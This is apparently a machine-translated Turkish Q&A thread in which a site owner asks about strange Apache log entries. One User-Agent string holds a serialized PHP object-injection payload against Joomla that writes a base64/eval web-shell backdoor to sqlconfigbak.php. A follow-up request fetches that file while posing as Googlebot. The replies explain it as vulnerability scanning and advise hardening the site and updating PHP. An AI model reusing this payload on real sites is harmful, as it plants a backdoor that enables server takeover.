Bazı betik saldırı teknikleri için kullanıcı aracısı kimliği kullanıldı mı?


10

Sitemdeki Apache erişim günlüğü girişleri genellikle şuna benzer:

207.46.13.174 - - [31 / Ekim / 2016: 10: 18: 55 +0100] "GET / iletişim HTTP / 1.1" 200 256 "-" "Mozilla / 5.0 (uyumlu; bingbot / 2.0; + http: // www .bing.com / bingbot.htm) "0.607 ÖZLÜK 10.10.36.125:104 0.607

böylece burada kullanıcı-aracı alanını görebilirsiniz. Ama bugün ayrıca şu şekilde kullanılan kullanıcı aracısı alanını buldum:

62.210.162.42 - - [31 / Ekim / 2016: 11: 24: 19 +0100] "GET / HTTP / 1.1" 200 399 "-" "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: {s: 2 "fc", O: 17: "JSimplepieFactory": 0: {} s: 21: "\ 0 \ 0 \ 0disconnectHandlers" a: 1: {i: 0 a: 2: {i: 0; a: 9: "SimplePie": 5: {s: 8: "sterilize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "FEED_URL"; s: 242: "file_put_contents ($ _server [" DOCUMENT_ROOT" ] .chr (47). "sqlconfigbak.php", "| = | \ x3C" .chr (63). "php \ x24mujj = \ x24_POST ['z']; eğer (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST [ 'z0']); @ Eval (\ "\\\ x24safedg = \ x24xsser; \");} "); jFactory :: getConfig (); exit;" s: 19:" cache_name_function "; s: 6:" assert "; s: 5:" önbellek "b 1; s: 11:" cache_class "; O: 20:"JDatabaseDriverMysql ": 0: {}} i: 1; s: 4:" init ";}} s: 13:" \ 0 \ 0 \ 0connection "; b: 1;} ~ Ů" 0.304 BYPASS 10.10.36.125:104 0,304

Bu bir saldırı mıydı? Bir sonraki günlük girdisinin sqlconfigbak.phpkomut dosyasında belirtilen başarılı bir şekilde alındığı (kod 200) dosyası olduğu görülüyor . Her ne kadar dosyayı dosya sisteminde bulamıyorum:

62.210.162.42 - - [31 / Ekim / 2016: 11: 24: 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1" 200399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (uyumlu; Googlebot / 2.1; + http: //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

Lütfen burada neler oluyordu?

Yanıtlar:



4

Bağladığınız IP adresi bir Google ana bilgisayar adına çözümlenmediği için Google değildir. Kişi veya bot sitenizi güvenlik açıklarına karşı tarıyor. Birincisi bir Joomla güvenlik açığı bulmaya çalışıyor.

Bu etkinlikler, çoğu web sitesinde düzenli bir durumdur, en iyi uygulamaları izlediğinizden ve web sitenizi sertleştirdiğinizden, işlemin uzun sürdüğünden ve çevrimiçi bir öğretici bulup izlemeniz gerekir.


Tamam teşekkürler. Bunu bulmadan önce web sitesini zaten sertleştirdim. Dürüst olmak gerekirse, böyle bir saldırı vektörü bulmak beni biraz şaşırttı.
miroxlav

2

Diğer cevaplara ek olarak, bu saldırının işe yaradığı gerçeğinin PHP'nin eski, güvensiz bir sürümünü çalıştırdığınızı gösterdiğini unutmayın. Bu saldırının istismar ettiği hatayı gidermek için Eylül 2015'te yayınlandı. Güncelleme işleminizi çalıştırın ve PHP'nin en son sürümünde çekildiğinden emin olun. Ve sunucunuz en az bir yıldır güncel tutulmamış gibi göründüğü için İnternet'e bakan diğer eski programları da kontrol edin.


Lanet olsun iyi bir nokta!
closetnoc
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.